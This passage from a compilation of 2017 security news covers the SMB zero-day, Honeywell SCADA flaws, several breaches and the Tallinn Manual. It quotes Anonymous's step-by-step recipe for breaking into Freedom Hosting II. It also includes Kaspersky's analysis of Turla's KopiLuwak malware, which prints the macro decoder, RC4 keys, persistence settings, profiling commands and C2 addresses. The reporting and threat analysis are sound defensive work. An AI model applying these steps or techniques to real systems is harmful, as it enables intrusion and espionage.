“The attack attempts detected by Check Point were directed to a large variety of destination countries (172 countries in total), with 26% of the attacks being towards networks in the United States. This indicates a wide wave of attacks rather than a targeted one.”
The researchers noticed that the largest volume of traffic associated with the Slammer Worm was originated from IP addresses in China, Vietnam, and Mexico.
This is absurd because it seems that the worm targeted a now-ancient SQL Server 2000 buffer overflow vulnerability that DB administrators still haven’t fixed after more than 13 years.
“To summarize, although the Slammer worm was primarily spread during 2003, and has barely been observed in the wild over the last decade, the massive spike in propagation attempts that was observed in our data leads us to wonder – is the worm trying to make a comeback?” states the report.
Windows SMB Zero-Day Exploit Released in the Wild after Microsoft delayed the Patch
6.2.2017 thehackernews Vulnerebility
Last weekend a security researcher publically disclosed a zero-day vulnerability in Windows 10, Windows 8.1 and Server editions after Microsoft failed to patch it in the past three months.
The zero-day memory corruption flaw resides in the implementation of the SMB (server message block) network file sharing protocol that could allow a remote, unauthenticated attacker to crash systems with denial of service attack, which would then open them to more possible attacks.
According to US-CERT, the vulnerability could also be exploited to execute arbitrary code with Windows kernel privileges on vulnerable systems, but this has not been confirmed right now by Microsoft.
Without revealing the actual scope of the vulnerability and the kind of threat the exploit poses, Microsoft has just downplayed the severity of the issue, saying:
"Windows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. We recommend customers use Windows 10 and the Microsoft Edge browser for the best protection."
However, the proof-of-concept exploit code, Win10.py, has already been released publicly for Windows 10 by security researcher Laurent Gaffie and does not require targets to use a browser.
The memory corruption flaw resides in the manner in which Windows handles SMB traffic that could be exploited by attackers; all they need is tricking victims to connect to a malicious SMB server, which could be easily done using clever social engineering tricks.
"In particular, Windows fails to properly handle a server response that contains too many bytes following the structure defined in the SMB2 TREE_CONNECT Response structure," CERT said in the advisory.
"By connecting to a malicious SMB server, a vulnerable Windows client system may crash (BSOD) in mrxsmb20.sys."
Since the exploit code is now publicly available to everyone and there is no official patch from Microsoft, all Windows users are left open to potential attacks at this time.
Until Microsoft patches the memory corruption flaw (most probably in the upcoming Windows update or out-of-band patch), Windows users can temporarily fix the issue by blocking outbound SMB connections (TCP ports 139 and 445 and UDP ports 137 and 138) from the local network to the WAN.
The vulnerability has been given Common Vulnerability Scoring System (CVSS) score of 7.8. Proof-of-concept code has been published on GitHub.
New York Man Admits to Role in Cybercrime Operation
6.2.2017 securityweek Cyber
Vyacheslav Khaimov, a 55-year-old man from Brooklyn, New York, has admitted taking part in an international cybercrime scheme and pleaded guilty to operating an unlicensed money transmitting business.
Khaimov was initially charged with conspiracy to commit wire and bank fraud, wire fraud, bank fraud, money laundering conspiracy, and money laundering.
According to authorities, cybercriminals used “sophisticated malware” to gain access to bank accounts, mostly belonging to people in the United States. The funds stolen from these accounts were wired to money mules in the U.S., who sent it to other intermediaries in the country, including Khaimov, or directly overseas.
The FBI determined that Khaimov, who had been using the alias “Samuel Gold,” received tens of thousands of dollars on numerous occasions from other mules, and forwarded the money to overseas co-conspirators, including to accounts in Thailand and various companies operated by these co-conspirators.
Investigators said Khaimov and a company he owned received more than $230,000 taken from the accounts of at least eight victims. Authorities believe the man was involved in fraudulent wire transfers pertaining to at least 20 victims.
The FBI has identified more than 20 money mules and over 30 victims. The cybercrime operation caused over $1.2 million in losses, but the fraudsters attempted to steal more than $6 million.
The FBI’s investigation into this scheme is ongoing and the agency says it’s determined to bring all co-conspirators to justice – court documents show there are at least four.
SCADA Honeywell XL Web II Controller exposed password in clear text
6.2.2017 securityaffairs Incindent
The web-based SCADA system Honeywell XL Web II Controller is affected by multiple flaws that can be remotely exploited to expose passwords in clear text.
A popular web-based SCADA system designed by Honeywell is affected by multiple vulnerabilities that can be remotely exploited to expose passwords in clear text.
In order to access the password in clear text, the attacker just has to access a particular URL to trigger one of the flaws.
The vulnerabilities affect some versions of Honeywell XL Web II controllers, a system that is widely adopted in critical infrastructure across various industries, including energy, wastewater, and manufacturing.
According to the ICS-CERT security advisory, the majority of the affected products is located in Europe and the Middle East.
The Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) issued a security advisory to warn of the flaws.
“Independent researcher Maxim Rupp has identified vulnerabilities in Honeywell’s XL Web II controller application.” reads the security advisory. “An attacker may use these vulnerabilities to expose a password by accessing a specific URL. The XL Web II controller application effectively becomes an entry point into the network where it is located.”
Follow
ICS-CERT @ICSCERT
ICS-CERT issued advisory ICSA-17-033-01 Honeywell XL Web II Controller Vulnerabilities to ICS-CERT web site http://go.usa.gov/x9Hqg
6:13 PM - 2 Feb 2017
19 19 Retweets 5 5 likes
Follow
Maxim Rupp @mmrupp
#Honeywell XL1000C500 XLWebExe-2-01-00 and prior + XLWeb 500 XLWebExe-1-02-08 and prior.
Coming soon. #ICS #Advisory
8:24 PM - 6 Jan 2017
1 1 Retweet 2 2 likes
The affected products are the Honeywell XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior.
Honeywell has produced a new version (version 3.04.05.05) to address the vulnerabilities, in order to receive the security updates customers have to contact their local Honeywell Building Solutions branch.
The attacker can also exploit other flaws in the Honeywell XL Web II controllers, he can carry out a path traversal attack by accessing a specific URL, open and change some parameters by accessing a particular URL, or establish a new user session.
The researcher Maxim Rupp that discovered the flaws has detailed them in a blog post recently published.
Anonymous Hacker took down over 10,000 Dark Web Sites; Leaked User Database
5.2.2017 thehackernews Hacking
Dark Web is right now going through a very rough time.
Just two days ago, a hacker group affiliated with Anonymous broke into the servers of Freedom Hosting II and took down more than 10,000 Tor-based .onion dark websites with an alarming announcement to its visitors, which said:
"Hello, Freedom Hosting II, you have been hacked."
Freedom Hosting II is the single largest host of underground websites accessible only through Tor anonymising browser that hosts somewhere between 15 and 20 percent of all sites on the Dark Web, anonymity and privacy researcher Sarah Jamie Lewis estimated.
Besides defacing all Dark Web sites hosted on Freedom Hosting II with the same message and stealing its database, the hackers also demanded a ransom for 0.1 Bitcoin (just over $100) to return the compromised data to the hosting service.
Now, it has been reported that the stolen database from Freedom Hosting II has publicly been released online to a site hosted on the Tor network, which includes the email details of nearly 381,000 users, 'Have I Been Pwned' tweeted.
According to the Anonymous hackers, more than 50 percent of all files hosted on Freedom Hosting II servers were related to child pornography.
Those illegal websites were using gigabytes of data when Freedom Hosting II officially allows no more than 256MB per site, the Anonymous hacker claimed.
In addition to dark sites user details, the data dump also contains backups of website database, most of which are based on popular, free, open source content management systems and forums like WordPress and PHPBB.
In an interview with Motherboard, an Anonymous hacker who claimed responsibility for the hack said this was his first hack ever, and he never intended to take down the hosting provider.
But when he allegedly discovered several large child pornography websites using more than Freedom Hosting II's stated allowance, he decided to take down the service. The hacker claimed to have downloaded 74GB of files and a users database dump of 2.3GB.
Lewis has been analyzing the leaked data and reported that the database contains Dark Web users' numerous plain text emails, usernames, and hashed passwords from forum websites hosted by Freedom Hosting II.
While it's bad news for users who joined one of those forums providing their genuine personal details, law enforcement would be happy, as in a separate case, the FBI used location-tracking malware to infiltrate Dark Web porn sites and track individual users.
Anonymous hacked Freedom Hosting II, a fifth of the Dark Web is down
5.2.2017 securityaffairs Hacking
The group of hacktivists Anonymous hacked the popular Freedom Hosting II Dark Web hosting provider, a fifth of the .onion websites is down.
The collective Anonymous is back, this time the hacker groups breached Freedom Hosting II, a popular Dark Web hosting provider.
After the closure of the original Freedom Hosting, Freedom Hosting II (FHII) become one of the largest onion web hosting providers, it is offering free space to any user who signs up for an account.
Anonymous targeted the popular Tor hosting provider because it was providing its services to a large number of websites sharing child pornography image.
The cyber attack was first spotted by Sarah Jamie Lewis, a privacy researcher at mascherari.press, who noticed the mass defacement during a regular scan of the Tor network.
Follow
Sarah Jamie Lewis @SarahJamieLewis
Looks like Freedom Hosting II got pwned. They hosted close to 20% of all dark web sites (previous @OnionScan report) https://mascherari.press/onionscan-report-september-2016-uptime-downtime-and-freedom-hosting-ii/ …
4:10 PM - 3 Feb 2017
Photo published for OnionScan Report: September 2016 - Uptime, Downtime and Freedom Hosting II
OnionScan Report: September 2016 - Uptime, Downtime and Freedom Hosting II
In this report we will examine how a single hosting provider has had a dramatic affect on the dark web.
mascherari.press
85 85 Retweets 57 57 likes
Since OnionScan started in April, Sarah Jamie Lewis and her team have observed FHII hosting between 1500 and 2000 services or about 15-20% of the total number of active sites in our scanning lists (data related to the last report published in October).
Back to the present, 10,613 .onion sites have taken down as a result of the Freedom Hosting II hack, all sites have been defaced with the following image. As you can see, the Anonymous message also includes a list of hacked websites.
Source Bleepingcomputer.com
Below the message published by Anonymous
“Hello Freedom Hosting II, you have been hacked
We are disappointed… This is an excerpt from your front page ‘We have a zero tolerance policy to child pornography.’ – but what we found while searching through your server is more than 50% child porn…
Moreover you host many scam sites, some of which are evidently run by yourself to cover hosting expenses.
All your files have been copied and your database has been dumped. (74GB of files and 2.3GB of database)
Up to January 31st you were hosting 10613 sites. Private keys are included in the dump. Show full list
We are Anonymous. We do not forgive. We do not forget. You should have expected us.
Thanks for your patience, you don’t have to buy data 😉 we made a torrent of the database dump download here
Here another torrernt with all system files (excluding user data) download
You may still donate BTC to 14iCDyeCSp12AmhVfJGxtrzXDabFop4QtU and support us.
If you need to get in contact with us, our mail is fhosting@sigaint.org
We repeatedly get asked how we got into the system. It was surprisingly easy. Here is how we did it: HOW TO HACK FH2“
According to The Verge, Anonymous attempted to offer for sale the compromised data back to Freedom Hosting II in exchange for 0.1 bitcoin (roughly $100).
Further analysis revealed that the attackers received at least two payments in their Bitcoin wallet, but they opted to publicly leak the data dump via torrent files.
Watch out, the 2.3 GB dump may contain disturbing images, don’t download the archive if you don’t need it. Anonymous claims to have downloaded 74GB of files.
Joseph cox from Motherboard interviewed one of the Anonymous hackers involved in the attack who explained this was his first hack ever, and he did not plan to take down all websites hosted on Freedom Hosting II.
“On Saturday, the hacker claiming responsibility told me in more detail how and why they took down the service.” wrote Cox.
“This is in fact my first hack ever,” they said in an email sent from the same address posted to the hacked Freedom Hosting II sites. “I just had the right idea.”
The hacker, who first compromised the service on January 30, told Vice that they found ten child pornography sites that had uploaded so much content that it accounted for nearly half of the total Freedom Hosting II files.
The security expert Chris Monteiro who analyzed some of the dumped data confirmed that archive includes .onion URLs hosting botnets, fraud sites, fetish websites hacked data, and of course child abuse websites.
The archive is full of private keys related to the dark web sites that could be used to impersonate them.
Follow
Deku_shrub @Deku_shrub
It's hungry work combing through these leaked databases
8:09 PM - 3 Feb 2017
Retweets 4 4 likes
Follow
Deku_shrub @Deku_shrub
Did you know you can access the WWE from the hacked accounts on the darknet? Am disappointed at the lack of John Cena references
10:40 PM - 3 Feb 2017
1 1 Retweet 2 2 likes
Follow
Deku_shrub @Deku_shrub
Looks like some botnets will have been knocked out in the Freedom Hosting II hack too
7:56 PM - 3 Feb 2017
4 4 Retweets 8 8 likes
Below the step-by-step procedure followed by Anonymous to hack Freedom Hosting II.
1. create a new site or login to an old one
2. login and set sftp password
3. login via sftp and create a symlink to /
4. disable DirectoryIndex in .htaccess
5. enable mod_autoindex in .htaccess
6. disable php engine in .htaccess
7. add text/plain type for .php files in .htaccess
8. have fun browsing files
9. find /home/fhosting
10. look at the content of the index.php file in /home/fhosting/www/
11. find configuration in /home/fhosting/www/_lbs/config.php
12. copy paste database connection details to phpmyadmin login
13. find active users with shell access in /etc/passwd
14. look through the scripts and figure out how password resets work
15. manually trigger a sftp password reset for the user 'user'
16. connect via ssh
17. run 'sudo -i'
18. edit ssh config in /etc/ssh/sshd_config to allow root login
19. run 'passwd' to set root password
20. reconnect via ssh as root
21. enjoy
Stay Tuned.
adrotate banner=”9″]
12 InterContinental Hotels Group properties suffered a massive data breach
5.2.2017 securityaffairs Incindent
Hackers compromised payment systems at 12 US properties of the InterContinental Hotels Group and stolen card data with a malware.
The hospitality giant InterContinental Hotels Group (IHG) has confirmed that payment systems of 12 US hotels were victims of a massive data breach. Just a month ago the company InterContinental Hotels Group (IHG) confirmed an ongoing investigation of alleged card breach at some of its properties.
The InterContinental Hotels Group (IHG) informed its customers that payment cards used between August and December 2016, at restaurants and bars of the 12 US hotels were affected by the data breach. The affected properties include the InterContinental San Francisco and Holiday Inn Resort – Aruba, the InterContinental Chicago Magnificent Mile.
The hackers used a malware to infect payment systems and steal card data, including cardholders’ name, card number, expiration date, and internal verification code.
“IHG hired leading cyber security firms to examine the payment card processing systems for the hotels that it manages in the Americas region. Based on the investigation, IHG is providing notification to guests who used their payment card at restaurants and bars of 12 company managed properties during the time periods from August 2016 – December 2016. An investigation of other properties in the Americas region is ongoing.” reads the official announcement published by the company.
The hospitality giant confirmed that the malicious code used by crooks did not affect payment cards used at the front desk.
“Findings show that malware was installed on servers that processed payment cards used at restaurants and bars of 12 IHG managed properties. Cards used at the front desk of these properties were not affected.” continued the statement from the company.
The InterContinental Hotels Group reported the security breach to the law enforcement and is collaborating with the payment card networks to allow banks monitoring for fraudulent transactions.
At the time I was writing there is no news regarding the number of affected customers.
IHG established a dedicated call center to answer any questions of the guests, for additional information about the security breach it is possible to visit the following website:
www.ihg.com/protectingourguests.
PoliceOne hacked – Hacker is selling thousands police officials’ accounts
5.2.2017 securityaffairs Hacking
PoliceOne, a forum used only by only verified law enforcement officials, has been hacked and data dump was offered for sale in a dark web market.
A hacker has stolen over 700,000 user accounts the from a popular law enforcement forum PoliceOne and is offering for sale the entire database.
The PoliceOne forum is used by verified police officers and investigators to exchange information on techniques of investigation, training or other law enforcement centric discussions.
“PoliceOne.com is the #1 resource for up-to-the-minute law enforcement information online. More than 500,000 police professionals nationwide are registered PoliceOne members and trust us to provide them with the most timely, accurate and useful information available anywhere.” reads the description of the website.
The news was reported by Motherboard, the precious data was offered for sale by a hacker that goes online with the moniker of the Berkut.
“We have confirmed the credibility of a purported breach of the PoliceOne forums in 2015 in which hackers were potentially able to obtain usernames, emails and hashed passwords for a portion of our members. While we have not yet verified the claim, we are taking immediate steps to secure user accounts and our forums, which are currently offline while we investigate and gather more information,” a spokesperson for PoliceOne told Motherboard in an email.
“While we store only limited user data and no payment information, we take any breach of data extremely seriously and are working aggressively to resolve the matter. We will be notifying potentially-affected users as a matter of priority and requiring them to change their passwords,” he added.
“Emails from NSA, DHS, FBI and other law enforcement agencies as well as other US government agencies,” Berkut’s listing on the Tochka dark web market reads.
Berkut is selling the full database which includes around 715,000 user accounts and dates from 2015, for $400. He used the Tochka dark web market to sell the data dump that contains emails from the main US intelligence agencies (NSA, DHS, FBI), the hacker also confirmed that he had already sold the archive also on other forums.
Berkut provided Motherboard as proof of the hack several samples of the data, including user details (i.e. usernames, email addresses, subscription dates, MD5 hashed passwords). However, the passwords also included salts—random strings of characters used to make a hash more resilient.
Let me remind you that MD5 hashed passwords are very easy to hack.
“The files did indeed contain valid email addresses from the NSA and other US government agencies; one file allegedly contained over 3,000 account details for Homeland Security staffers.” reported the Motherboard.
“To verify that emails in the dump were connected to real accounts on PoliceOne, Motherboard attempted to create new users with a random selection of email addresses. Out of 15 addresses, 14 were already registered on the site.”
How did Bekrut hack the PoliceOne website?
The PoliceOne was running on a flawed version of the popular vBulletin CMS (likely version 4.2.3), it was quite easy for the hacker to find an exploit online and breach it.
KopiLuwak: A New JavaScript Payload from Turla
4.2.2017 Kaspersky Virus
On 28 January 2017, John Lambert of Microsoft (@JohnLaTwC) tweeted about a malicious document that dropped a “very interesting .JS backdoor“. Since the end of November 2016, Kaspersky Lab has observed Turla using this new JavaScript payload and specific macro variant. This is a technique we’ve observed before with Turla’s ICEDCOFFEE payloads, detailed in a private report from June 2016 (available to customers of Kaspersky APT Intelligence Services). While the delivery method is somewhat similar to ICEDCOFFEE, the JavaScript differs greatly and appears to have been created mainly to avoid detection.
Targeting for this new malware is consistent with previous campaigns conducted by Turla, focusing on foreign ministries and other governmental organizations throughout Europe. Popularity of the malware, however, is much lower than ICEDCOFFEE, with victim organizations numbering in the single digits as of January 2017. We assess with high confidence this new JavaScript will be used more heavily in the future as a stage 1 delivery mechanism and victim profiler.
The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the actors to run arbitrary commands via Wscript.
Actor Profile
Turla, also known as Snake / Uroburos / Venomous Bear and KRYPTON is a Russian-speaking APT group that has been active since at least 2007. Its activity can be traced to many high-profile incidents, including the 2008 attack against the US Central Command, (see Buckshot Yankee incident) or more recently, the attack against RUAG, a Swiss military contractor. The Turla group has been known as an agile, very dynamic and innovative APT, leveraging many different families of malware, satellite-based command and control servers and malware for non-Windows OSes.
Targeting Ukraine, EU-related institutions, governments of EU countries, Ministries of Foreign Affairs globally, media companies and possibly corruption related targets in Russia, the group intensified their activity in 2014, which we described in our paper Epic Turla. During 2015 and 2016 the group diversified their activities, switching from the Epic Turla waterhole framework to the Gloog Turla framework, which is still active. They also expanded their spear phishing activities with the Skipper / WhiteAtlas attacks, which leveraged new malware. Recently, the group has intensified their satellite-based C&C registrations ten-fold compared to their 2015 average.
Technical Details
Sample MD5: 6e7991f93c53a58ba63a602b277e07f7
Name: National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc
Author: user
LastModifiedBy: John
CreateDate: 2016:11:16 21:58:00
ModifyDate: 2016:11:24 17:42:00
KopiLuwak: A New JavaScript Payload from Turla
The lure document above shows an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs (MoFA) in Cyprus. Based on the name of the document (National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc, it is presumed it may have been sent from the Qatar Ambassador’s secretary to the MoFA, possibly indicating Turla already had control of at least one system within Qatar’s diplomatic network.
The document contains a malicious macro, very similar to previous macros used by Turla in the past to deliver Wipbot, Skipper, and ICEDCOFFEE. However, the macro did contain a few modifications to it, mainly the XOR routine used to decode the initial JavaScript and the use of a “marker” string to find the embedded payload in the document.
New XOR Routine
Below is a snippet of the new XOR routine used to decode the initial JavaScript payload. Turla has consistently changed the values used in this routine over the last year, presumably to avoid easy detection:
Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
Dim THQNfU76nlSbtJ5nX8LY6 As Byte
THQNfU76nlSbtJ5nX8LY6 = 45
For i = 0 To M5wI32R3VF2g5B21EK4d – 1
EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
Next i
Q7JOhn5pIl648L6V43V = True
End Function
1
2
3
4
5
6
7
8
9
Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
Dim THQNfU76nlSbtJ5nX8LY6 As Byte
THQNfU76nlSbtJ5nX8LY6 = 45
For i = 0 To M5wI32R3VF2g5B21EK4d – 1
EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
Next i
Q7JOhn5pIl648L6V43V = True
End Function
Here is a function written in Python to assist in decoding of the initial payload:
def decode(payload, length):
varbyte = 45
i = 0
for byte in payload:
payload[i] = byte ^ varbyte
varbyte = ((varbyte ^ 99) ^ (i % 254))
i += 1
1
2
3
4
5
6
7
def decode(payload, length):
varbyte = 45
i = 0
for byte in payload:
payload[i] = byte ^ varbyte
varbyte = ((varbyte ^ 99) ^ (i % 254))
i += 1
Payload Offset
Another change in the macro is the use of a “marker” string to find the payload offset in the document. Instead of using hard coded offsets at the end of the document as in ICEDCOFFEE, the macro uses the below snippet to identify the start of the payload:
Set VUy5oj112fLw51h6S = CreateObject(“vbscript.regexp”)
VUy5oj112fLw51h6S.Pattern = “MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh”
Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
1
2
3
Set VUy5oj112fLw51h6S = CreateObject(“vbscript.regexp”)
VUy5oj112fLw51h6S.Pattern = “MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh”
Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
Second Layer JavaScript
Once the marker is found, the macro will carve out “15387 + 1” bytes (hard coded) from the end of the marker and pass that byte array to the aforementioned decoding routine. The end result is a JavaScript file (mailform.js – MD5: 05d07279ed123b3a9170fa2c540d2919) written to “%APPDATA%\Microsoft\Windows\”.
mailform.js – malicious obfuscated JavaScript payload
This file is then executed using Wscript.Shell.Run() with a parameter of “NPEfpRZ4aqnh1YuGwQd0”. This parameter is an RC4 key used in the next iteration of decoding detailed below.
The only function of mailform.js is to decode the third layer payload stored in the JavaScript file as a Base64 string. This string is Base64 decoded, then decrypted using RC4 with the key supplied above as a parameter (“NPEfpRZ4aqnh1YuGwQd0”). The end result is yet another JavaScript which is passed to the eval() function and executed.
Third Layer JavaScript
The third layer payload is where the C2 beaconing and system information collection is performed. This JS will begin by copying itself to the appropriate folder location based on the version of Windows running:
c:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\mailform.js
c:\Users\<USERNAME>\AppData\Local\Temp\mailform.js
c:\Documents and Settings\<USERNAME>\Application Data\Microsoft\Windows\mailform.js
Persistence
Next, it will establish persistence on the victim by writing to the following registry key:
Key: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\mailform
Value: wscript.exe /b “<PATH_TO_JS> NPEfpRZ4aqnh1YuGwQd0”
Profiling
After establishing its persistence, it will then execute a series of commands on the victim system using “cmd.exe /c” and store them to a file named “~dat.tmp”, in the same folder where “mailform.js” is located:
systeminfo
net view
net view /domain
tasklist /v
gpresult /z
netstat -nao
ipconfig /all
arp -a
net share
net use
net user
net user administrator
net user /domain
net user administrator /domain
set
dir %systemdrive%\Users\*.*
dir %userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*
dir %userprofile%\Desktop\*.*
tasklist /fi “modules eq wow64.dll”
tasklist /fi “modules ne wow64.dll”
dir “%programfiles(x86)%”
dir “%programfiles%”
dir %appdata%
Once the information is collected into the temporary “~dat.tmp” file, the JavaScript reads its contents into memory, RC4 encrypts it with the key “2f532d6baec3d0ec7b1f98aed4774843”, and deletes the file after a 1 second sleep, virtually eliminating storage of victim information on disk and only having an encrypted version in memory.
Network Communications
With the victim info stored in encrypted form in memory, the JavaScript then will perform the necessary callback(s) to the C2 servers which are hard coded in the payload. The addresses seen in this payload were as follows:
http://soligro[.]com/wp-includes/pomo/db.php
http://belcollegium[.]org/wp-admin/includes/class-wp-upload-plugins-list-table.php
It should be noted that the above domains appear to have been compromised by the actor based on the locations of the PHP scripts.
Belcollegium[.]org – a legitimate website compromised and used for C2
Victim data is sent to the C2 servers in the form of a POST request. The headers of the POST request contain a unique User-Agent string that will remain the same per victim system. The User-Agent string is created by performing the following steps:
Concatenate the string “KRMLT0G3PHdYjnEm” + <SYSTEM_NAME> + <USER NAME>
Use the above string as input to the following function (System Name and User Name have been filled in with example data ‘Test’ and ‘Admin’):
function EncodeUserAgent() {
var out = “”;
var UserAgent = ‘KRMLT0G3PHdYjnEm’ + ‘Test’ + ‘Admin’;
for (var i = 0; i < 16; i++) {
var x = 0
for (var j = i; j < UserAgent.length – 1; j++) {
x = x ^ UserAgent.charCodeAt(j);
}
x = (x % 10);
out = out + x.toString(10);
}
out = out + ‘KRMLT0G3PHdYjnEM’;
return out;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
function EncodeUserAgent() {
var out = “”;
var UserAgent = ‘KRMLT0G3PHdYjnEm’ + ‘Test’ + ‘Admin’;
for (var i = 0; i < 16; i++) {
var x = 0
for (var j = i; j < UserAgent.length – 1; j++) {
x = x ^ UserAgent.charCodeAt(j);
}
x = (x % 10);
out = out + x.toString(10);
}
out = out + ‘KRMLT0G3PHdYjnEM’;
return out;
}
The function above will produce a unique “UID” consisting of a 16-digit number with the string “KRMLT0G3PHdYjnEm” appended to the end. In the example above using the System Name “Test” and User Name “Admin”, the end result would be “2356406508689132KRMLT0G3PHdYjnEm”
Prepend the string “user-agent:”, “Mozilla/5.0 (Windows NT 6.1; Win64; x64); ” to the result from the last step. This will now be the unique User-Agent value for the victim callbacks. In this example, the final result will be “user-agent:”, “Mozilla/5.0 (Windows NT 6.1; Win64; x64); 2356406508689132KRMLT0G3PHdYjnEm”.
The POST request will contain the unique User-Agent string above as one of the headers and also the Base64 encoded version of the RC4 encrypted victim data collected earlier.
The C2 will respond in one of four ways after the POST request:
“good”
“exit”
“work”
“fail”
In the case of an answer of “good”, the JavaScript will then sleep for a random amount of time, ranging from 3600-3900 seconds.
The “exit” command will cause script to exit gracefully, thus shutting down the communications to the C2 server until next startup / login from the user.
The “fail” command is for uninstalling the JavaScript and its persistence. Both the “mailform.js” file and registry key created for persistence will be deleted upon receipt of this command.
The “work” command is used to task the victim’s system to run arbitrary commands via Wscript.shell.run(). It begins by checking to see if a file “mailform.pif” exists in the same directory as the JavaScript, and if so, it will delete it. The victim will then send a POST request to the C2 much in the same way as before with the beacon traffic, but with some slight differences. The User-Agent header will remain the same as in the beacon traffic, but the data sent to the C2 will consist of the 4-byte string “work”. If the response from the server after this acknowledgement is “200 OK”, then the system will proceed to read the response data into memory, RC4 encrypt it using the same key “2f532d6baec3d0ec7b1f98aed4774843”, then write it out to the “mailform.pif” file referenced above. The command file is run, the JavaScript will sleep for 30 seconds, and then the file is subsequently deleted.
Victims and Sinkholing
One of the domains involved in this new malware (soligro[.]com) expired in July 2016 and was was available for purchase and sinkhole at the time of the analysis. Sinkhole data shows several potential victims, with one high profile victim (195.251.32.62) located within the Greek Parliament:
The majority of connections to the sinkhole server have been observed from IP ranges residing within Greece. This leads us to believe the main target for the specific document above was Greece, although we also have indications of targeting in Romania and Qatar based on other data.
Conclusions
In recent months, the Turla actors have increased their activity significantly. The addition of KopiLuwak to their already existing ICEDCOFFEE JavaScript payload indicates the group continues to evolve and deliver new tools to avoid detection by known malware signatures.
Currently, it seems the Turla actors continue to rely heavily on embedded macros in Office documents. While this may appear to be an elementary technique to use for such a sophisticated actor, they are repeatedly successful in compromising high value targets with this method. It is advised that users disable macros in their enterprise and not allow the user to enable said content unless absolutely necessary. Furthermore, using the polymorphic obfuscation technique for the macros has caused difficulties in writing signatures for detection.
NATO Publishes Tallinn Manual 2.0 on International Law Applicable to Cyber Ops
4.2.2017 securityweek Cyber
NATO's Cooperative Cyber Defense Centre of Excellence (CCDCOE), based in Tallinn Estonia, has published 'Tallinn Manual 2.0 on the International Law Applicable to Cyber Operations.' Its world launch will be in Washington DC, February 8 at The Atlantic Council; followed by Europe at The Hague, February 13; and Tallinn, February 17.
Tallinn 2.0 incorporates Tallinn 1.0, published in 2012. While Tallinn 1 sought to define how international law relates to cyberwar, Tallinn 2 expands the content to include cyber activity that falls short of actual warfare. To reflect this expansion in content, the name has changed from 'applicable to cyber warfare' to 'applicable to cyber operations'.
Tallinn Manual 2.0 CoverThe Tallinn Manual takes no moral standpoint. It starts from the observation that cyber operations are subject to existing pre-cyber international law, and then defines how that law should be applied to different cyber operations. This forces it to confront many of the apparent difficulties in international cyber behavior head on -- such as the applicability of self-defense and the right to strike back, and attribution.
The Tallinn Manual process is led by Michael Schmitt, an expert in the law of armed conflict, Professor of Public International Law at Exeter Law School, and a Senior Fellow at the United States Naval War College. It is authored by nineteen international law experts. Although it has no legal standing and does not represent the views of NATO per se, it has become an influential resource for legal advisers dealing with cyber issues.
Schmitt told SecurityWeek that the Manual 1.0 publication became far more popular than was expected. He thought one reason was that it provided a legal position that didn't force governments to declare their own preference. "Governments," he suggested, "want to set legal bars high for potential aggressors while setting them as low as possible for themselves." The Manual takes away that dilemma be presenting the existing legal position under international law.
Tallinn Manual
Tallinn 2.0 expands this legal exploration beyond cyber warfare into civilian situations. This makes it more complex because it includes the multitude of cyber intrusions faced by commercial organizations every day. But it is international law rather than any national law that is explored.
For example, there is growing enthusiasm for the right for private industry to strike back at aggressors, almost as an extension of self-defense. The law, however, is relatively simple -- they cannot. Schmitt gave an example. "If a foreign nation launched an attack against Exeter University, there would be a right for retaliatory action; but not by Exeter University. The attack could be considered as an attack against the UK; but only the UK government could respond."
Attribution is another difficult area. The law cannot be applied against a transgressor if the transgressor is not definitively known. There have been attempts to develop acceptable methods of attribution; most notably perhaps by Microsoft. Microsoft's proposal would be for an international committee of independent experts who would decide on and name transgressors.
Schmitt is not a great supporter of this approach; not because it is bad, but because it ultimately depends on recommendations. The law is not about recommendations, but about clear mandates. "I don't know about technical attribution," he told SecurityWeek. "I've heard arguments that it is and it is not possible. But whenever I talk to intelligence agencies, they all say attribution is not based on simple technology, but on the summation of intelligence information -- signals intelligence, field agents, geopolitics and so on."
Once a government is confident in its attribution -- and particularly if other governments agree with that attribution -- then the Tallinn Manual can explain the legally permissible response.
Tallinn 2, explains the associated CCDCOE announcement, "covers a full spectrum of international law applicable to cyber operations ranging from peacetime legal regimes to the law of armed conflict, covering a wide array of international law principles and regimes that regulate events in cyberspace. Some pertain to general international law, such as the principle of sovereignty and the various bases for the exercise of jurisdiction. The law of state responsibility, which includes the legal standards for attribution, is examined at length. Additionally, numerous specialised regimes of international law, including human rights law, air and space law, the law of the sea, and diplomatic and consular law, are examined in the context of cyber operations."
Tallinn Manual 2.0 is available from Cambridge University Press.
Hacker leaked tools stolen from mobile forensics company Cellebrite
4.2.2017 thehackernews Mobil
